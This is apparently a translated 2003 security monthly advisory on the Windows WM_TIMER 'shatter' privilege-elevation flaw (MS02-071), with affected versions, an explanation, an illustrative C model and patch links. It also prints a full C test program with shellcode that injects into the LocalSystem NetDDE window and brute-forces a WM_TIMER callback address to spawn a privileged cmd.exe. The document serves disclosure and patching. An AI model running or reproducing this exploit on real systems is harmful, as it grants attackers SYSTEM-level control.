NSFOCUS Security Monthly, Issue 38: Latest Vulnerabilities
Windows WM_TIMER Message Handling Privilege Elevation Vulnerability

Date: 2003-01-03

Published: 2002-12-11
Updated: 2002-12-16

Affected systems:
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows 2000 SP3
Microsoft Windows 2000 SP2
Microsoft Windows 2000 SP1
Microsoft Windows 2000
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 5927
CVE(CAN) ID: CAN-2002-1230

Windows messages provide interactive handling of user events (such as keystrokes or mouse movement) and communication with other interactive processes. A WM_TIMER message is normally sent when a timer expires, and it can instruct the receiving process to execute a timer callback function.

WM_TIMER message handling has a security flaw: a local attacker, or one with Terminal Services access, can use a WM_TIMER message to make another, higher-privileged process execute a callback function, resulting in privilege elevation.

Because of this flaw, a process on the interactive desktop can send a WM_TIMER message that triggers another process to execute a callback at an address of the sender's choosing, even if the second process has never set any timer. If the second process runs with higher privileges than the first, the callback executes with those higher privileges.

By default, several processes on the interactive desktop run as LocalSystem. As a result, an attacker who is interactively logged on to the system can run a program that sends WM_TIMER requests to such a process and exploit the flaw to perform arbitrary attacker-chosen actions with elevated privileges.

In addition, the patch for this vulnerability also modifies several other highly privileged processes that run on the interactive desktop. Although these processes are not affected by the WM_TIMER flaw, Microsoft included them in the patch to make those services more robust.
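As an added illustration (not code from the advisory, from Serus, or from Microsoft), the following plain C model contrasts the dispatch described above, where the callback address arrives in the message itself, with a hardened dispatch that only runs callbacks the process registered through its own SetTimer-style call. All sim_* names, the timer table and the sample ids are constructed for this model; the real message number 0x0113 is the only value taken from Windows.

```c
/* Added model (not the advisory's or Microsoft's code) of the WM_TIMER
 * dispatch that MS02-071 hardens. All sim_* names are constructed here. */
#include <stdint.h>
#include <stddef.h>

#define SIM_WM_TIMER   0x0113   /* the real WM_TIMER message number */
#define SIM_MAX_TIMERS 8

typedef void (*sim_timerproc)(uintptr_t timer_id);

/* The process's own timer table: only sim_set_timer (the SetTimer analogue) fills it. */
static struct { uintptr_t id; sim_timerproc proc; int used; } sim_timers[SIM_MAX_TIMERS];
static int       sim_calls;        /* callbacks that actually ran */
static uintptr_t sim_last_target;  /* address the vulnerable path would have jumped to */

static void sim_own_callback(uintptr_t timer_id) { (void)timer_id; sim_calls++; }

static int sim_set_timer(uintptr_t id, sim_timerproc proc)
{
    for (int i = 0; i < SIM_MAX_TIMERS; i++) {
        if (!sim_timers[i].used) {
            sim_timers[i].id = id; sim_timers[i].proc = proc; sim_timers[i].used = 1;
            return 1;
        }
    }
    return 0;
}

/* Pre-patch behaviour: lParam is trusted as the callback address, so whoever
 * can post WM_TIMER to the window picks the code that runs in its context.
 * Returns 1 when a jump to lparam would happen (recorded here, not performed). */
static int sim_dispatch_vulnerable(unsigned msg, uintptr_t wparam, uintptr_t lparam)
{
    (void)wparam;
    if (msg != SIM_WM_TIMER || lparam == 0) return 0;
    sim_last_target = lparam;
    return 1;
}

/* Hardened behaviour: lParam is ignored; the callback comes only from the
 * table this process filled itself, keyed by the timer id in wParam. */
static int sim_dispatch_hardened(unsigned msg, uintptr_t wparam, uintptr_t lparam)
{
    (void)lparam;
    if (msg != SIM_WM_TIMER) return 0;
    for (int i = 0; i < SIM_MAX_TIMERS; i++) {
        if (sim_timers[i].used && sim_timers[i].id == wparam) {
            sim_timers[i].proc(wparam);
            return 1;
        }
    }
    return 0;  /* timer id never registered by this process: message dropped */
}
```

The same message that makes the vulnerable path accept an arbitrary address is dropped by the hardened path unless its timer id was registered locally, which is the property a defender wants to verify after patching.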

<*Source: Serus (serus@users.mns.ru)
  
  Links: http://security.tombom.co.uk/shatter.html
         http://www.microsoft.com/technet/security/bulletin/MS02-071.asp
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear all risk themselves!

Serus (serus@users.mns.ru) provided the following test program:

//
/////////// Copyright Serus 2002////////////////
//mailto:serus@users.mns.ru
//
//This program checks whether the winlogon bug is present on the system
//Only for Windows 2000
//This is for check use only!
//

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>     // malloc, srand, rand
#include <string.h>     // memcpy, memset


int main(int argc, char *argv[ ], char *envp[ ] )
{
    char    *buf;
    DWORD    Addr = 0;

    unsigned char sc[] = {    // my simple shellcode, it calls CreateProcess function,
                            // executes cmd.exe on user`s desktop and creates mutex.
        0x8B, 0xF4,
        0x68, 0x53, 0x45, 0x52, 0x00,
        0x8B, 0xDC, 0x54, 0x6A, 0x00, 0x6A, 0x00,
        0xB8, 0xC8, 0xD7, 0xE8, 0x77, 0xFF, 0xD0, 0x8B, 0xE6,
        0x6A, 0x00, 0x68, 0x2E, 0x65, 0x78, 0x65, 0x68, 0x00,
        0x63, 0x6D, 0x64, 0x68, 0x61, 0x75, 0x6C, 0x74, 0x68, 0x5C, 0x44,
        0x65, 0x66, 0x68, 0x53, 0x74, 0x61, 0x30, 0x68, 0x00, 0x57, 0x69,
        0x6E, 0x8B, 0xD4, 0x42, 0xB9, 0x50, 0x00, 0x00, 0x00, 0x6A, 0x00,  
        0xE2, 0xFC, 0x6A, 0x44, 0x83, 0xC4, 0x0C, 0x52, 0x83, 0xEC, 0x0C,
        0x8B, 0xC4, 0x83, 0xC0, 0x10, 0x50, 0x8B, 0xC4, 0x83, 0xC0, 0x08,
        0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00,
        0x6A, 0x00, 0x83, 0xC2, 0x10, 0x52, 0x6A, 0x00, 0xB8, 0x4D, 0xA4,
        0xE9, 0x77, 0xFF, 0xD0, 0x8B, 0xE6, 0xC3
    };

    HWND            hWnd;
    COPYDATASTRUCT    cds;
    HMODULE            hMod;
    DWORD            ProcAddr;
    HANDLE            hMutex;
    char            mutname[4];

    printf("\n\n==== GetAd by Serus (serus@users.mns.ru) ====");

    // Get NetDDE Window (a LocalSystem process on the interactive desktop)
    hWnd = FindWindow("NDDEAgnt","NetDDE Agent");
    if(hWnd == NULL)
    {
        MessageBox(NULL, "Couldn't find NetDDE agent window", "Error", MB_OK | MB_ICONSTOP);
        return 1;
    }

    // Get CreateProcessA and CreateMutexA entry addresses and patch them into
    // the shellcode (the immediates of its two "mov eax, imm32" instructions)
    hMod = GetModuleHandle("kernel32.dll");
    ProcAddr = (DWORD)GetProcAddress(hMod, "CreateProcessA");

    if(ProcAddr == 0)
    {
        MessageBox(NULL, "Couldn't get CreateProcessA address", "Error", MB_OK | MB_ICONSTOP);
        return 1;
    }
    *(DWORD *)(sc + 86 + 21) = ProcAddr;

    ProcAddr = (DWORD)GetProcAddress(hMod, "CreateMutexA");
    if(ProcAddr == 0)
    {
        MessageBox(NULL, "Couldn't get CreateMutexA address", "Error", MB_OK | MB_ICONSTOP);
        return 1;
    }
    *(DWORD *)(sc + 15) = ProcAddr;

    //Generate random Mutex name (three letters plus NUL) that does not exist yet
    srand(GetTickCount());

    do
    {
        mutname[0] = 97 + rand()%25;
        mutname[1] = 65 + rand()%25;
        mutname[2] = 65 + rand()%25;
        mutname[3] = 0;
    }
    while((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0);
    memcpy(sc + 3, mutname, 4);    // the "push" immediate that holds the mutex name

    //Form buffer for SendMessage: shellcode followed by RET (0xC3) padding
    buf = (char *)malloc(1000);
    if(buf == NULL)
    {
        return 1;
    }
    memset(buf, 0xC3, 1000);
    memcpy(buf, sc, sizeof(sc));

    cds.cbData = 1000;
    cds.dwData = 0;
    cds.lpData=(PVOID)buf;

    //If first login
    //Send shellcode buffer
    SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds);
    //Try execute it at 0x0080FA78
    PostMessage(hWnd, WM_TIMER, 1, (LPARAM)0x0080FA78);
    printf("\n\nTrying at 0x%X", 0x0080FA78);

    //If fails (perhaps not first login)
    //Try to bruteforce shellcode address
    for(Addr = 0x0120fa78; Addr < 0x10000000; Addr += 0x10000)
    {
        //If mutex exists, shellcode has been executed
        if((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0)
        {
            //Success
            printf("\nSuccess!!!\n");
            printf("\nWarning! Your system has the vulnerability!\n");
            CloseHandle(hMutex);
            return 0;
        }
        printf("\rTrying at 0x%X", Addr);

        SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds);
        PostMessage(hWnd, WM_TIMER, 1, (LPARAM)Addr);
    }

    //Bug in winlogon not present
    printf("\n\nBad luck! Reboot and try again.\n\n");
    return 0;
}

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

Microsoft
---------
Microsoft has released a security bulletin (MS02-071) and the corresponding patch for this issue:
MS02-071: Flaw in Windows WM_TIMER Message Handling Could Enable Privilege Elevation (328310)
Link: http://www.microsoft.com/technet/security/bulletin/MS02-071.asp

Patch download:

Microsoft Windows 2000 Professional SP3:
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Server SP3:
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Advanced Server SP3:
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Terminal Services SP3:
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Datacenter Server SP3:
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Terminal Services SP2:
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Advanced Server SP2:
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Datacenter Server SP2:
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Professional SP2:
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Server SP2:
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Server SP1:
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Professional SP1:
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Advanced Server SP1:
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Datacenter Server SP1:
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Terminal Services SP1:
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows XP Home SP1:
      Microsoft Patch Q328310_WXP_SP2_x86_ENU.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=98F02C55-E598-4EB1-AABE-DB3BA0807685&displaylang=en
Microsoft Windows XP Professional SP1:
      Microsoft Patch Q328310_WXP_SP2_x86_ENU.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=98F02C55-E598-4EB1-AABE-DB3BA0807685&displaylang=en
Microsoft Windows 2000 Server :
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Advanced Server :
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Professional :
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Terminal Services :
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
Microsoft Windows 2000 Server Japanese Edition :
      Microsoft Patch Q328310_W2K_SP4_nec98_JA.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=68601571-CF9C-4BD0-B285-26C0A3DF6FCA&displaylang=ja
Microsoft Windows XP Professional :
Microsoft Windows XP Home :
Microsoft Windows 2000 Datacenter Server :
      Microsoft Patch Q328310_W2K_SP4_X86_EN.exe
      http://microsoft.com/downloads/details.aspx?FamilyId=C663A0EA-F6CB-4EE1-8AFA-0C068F84A1D5&displaylang=en
All rights reserved. Reproduction without permission is prohibited.